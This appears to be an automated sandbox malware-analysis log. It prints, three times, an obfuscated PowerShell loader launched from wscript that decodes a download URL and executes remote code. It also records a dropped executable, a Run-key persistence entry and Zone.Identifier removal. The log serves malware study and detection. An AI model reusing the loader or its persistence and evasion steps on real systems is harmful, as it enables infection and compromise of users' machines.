            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds Nugacities Komedianter104 Palatalise Hygiejnekommsionens Redesignating Ungrubbed Fondshandler Fiskeflaaderne Discophile Curarize Anmeldtes Refracting Hellenizer Teknologipolitiks Generalstabskorts Dubitate Blodfattigheds Helcology Cavillation Fallesen Alouatta Vitial Unemptiable Datasikkerheds';If (${host}.CurrentCulture) {$Smaastykker++;}Function Immatrikulationens($Marios){$Syntomy=$Marios.Length-$Smaastykker;$Pronenesses='SUBsTRI';$Pronenesses+='ng';For( $Dipsomaniacs=2;$Dipsomaniacs -lt $Syntomy;$Dipsomaniacs+=3){$Nugacities+=$Marios.$Pronenesses.Invoke( $Dipsomaniacs, $Smaastykker);}$Nugacities;}function Influerende($Svippedes){ . ($Gnier111) ($Svippedes);}$Sclaffs=Immatrikulationens 'HuMN,oGazHuiKal,elBeaDa/p,5La.Fr0Ru He(A WPuiCun UdKuo .wSls l .N sTEp Li1 B0Fy.P,0.y;I. .eWCaiB,nS,6Di4Te;Vi Bx,o6E.4,i;No BurUlvGl:Un1Co2Sy1D.. U0 n)Sw IGSceV c.hkCyoNo/ C2Ch0cu1tr0di0Ko1Dr0Pe1Li AwF.ni drAreOrfT.oSixCo/R 1 2Re1 J.So0.a ';$Dissers=Immatrikulationens 'G U Es ne .r,e-IdA agEmeS,nSttso ';$Redesignating=Immatrikulationens ' RhAft CtBepS sKu:Va/ P/ .datrUdiF,vOveSa. UgTaoSko,eg UlSoeCa.Syc Uo emVe/,euBecKr?D,eCoxI,p Ko ,r StIn=,edIro .wK.n.el,roChagld.a&Fristd.e=Ac1N,T uTaX o3InpKaGRoV .QOmO Mu AYReuD.NOv0UnPMoVFifA.0s.S ,1PrvChuSaO,eoK.v,uPV,ZVacE 7Ar6PhtUd5 ';$Bourre=Immatrikulationens 's,>I ';$Gnier111=Immatrikulationens 'FriSke Ix ';$Hoodwinked='Fiskeflaaderne';$Parastades = Immatrikulationens ' FeGacF,h Fo,r .l%K.a epAlpSpdJiaOutPeaU,%,l\FrBMoe ol YlAteT rKiiPacUn7C.4 F.G,AB,f RsEk Fo&St&K, HeCyc DhKloCo U.t n ';Influerende (Immatrikulationens 'Ti$ExgAllIdoHubbea Klsa: .CDehJeaHecSpoCun Nn FeGur Us J1 S7A,2.v=Be(CacCamMadS Si/TucEx Co$P.PTwaSirDeas.s,ft AaAedReeKosPe),r ');Influerende (Immatrikulationens 'Sn$S.g OlCuoFobTuanolL :KrHKoyBag .iDieI,jUnnSke uk Oo amVemEksMii oo .nUbeDenUdsW,= T$DeRJae.jd Ee .sBiiIngOpn,saYat riSonFeg T.C.s.vpB.lGei StUn(Fa$ UB o Au.tr FrByeP.) ');Influerende (Immatrikulationens ' T[ IN ieUrtPs.P S,beRer Iv .iTicReeDuPPlo iiAfno,tLiMS,aLin Ta hg MeKorDi]no:Fi: SPre,gcS,uTir iUnt,eyAmPBrrCeo etTroUscstoSvl E ,o= T I [AnNDreUnt.k.F SDeeWecTuu .r.hi ,t,myAtP.tr SoHitFooM,cDuo lUnT.uy ApSle r] l:s.: ,TOflsmsPa1Un2 A ');$Redesignating=$Hygiejnekommsionens[0];$Fangstbaaden190= (Immatrikulationens 'Am$,igUnlhaoEqbKla.al,e:.lKcooSun ,sFoe rk MvTeec,nL,tHjePosOs=.mNFieOpwS -W,O ab .jBleIncDetCa thS PyResAntTee .mMu.EpN KeP.t a.S,WSoe,ebOvC .lFaiKbeA.nLkt');$Fangstbaaden190+=$Chaconners172[1];Influerende ($Fangstbaaden190);Influerende (Immatrikulationens 'Ar$ToKFooKvnOvsK.edok,Jump to behavior
            Source: GrOcCQC.exe.15.drStatic PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]
            Source: GrOcCQC.exe.15.drStatic PE information: section name: .didat
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFE57817E38 push eax; retf 9_2_00007FFE57817E41
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFE578100BD pushad ; iretd 9_2_00007FFE578100C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FFE578E2E8D push eax; retf 9_2_00007FFE578E2E8E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_046B93A5 push eax; retf 13_2_046B93A9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07591FC8 push eax; mov dword ptr [esp], ecx13_2_075921B4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08B044E9 push 8BD38B50h; iretd 13_2_08B044EF
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08B0427E push 8BD68B50h; iretd 13_2_08B04291
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08B01B3B push FFFFFFE8h; iretd 13_2_08B01B3D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08B04748 push 8BD38B50h; iretd 13_2_08B0474E
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeCode function: 16_2_007E13F8 pushfd ; retf 16_2_007E13F9
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeCode function: 16_2_007E376D push ecx; ret 16_2_007E3780
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrOcCQCJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GrOcCQCJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\AppData\Roaming\GrOcCQC\GrOcCQC.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
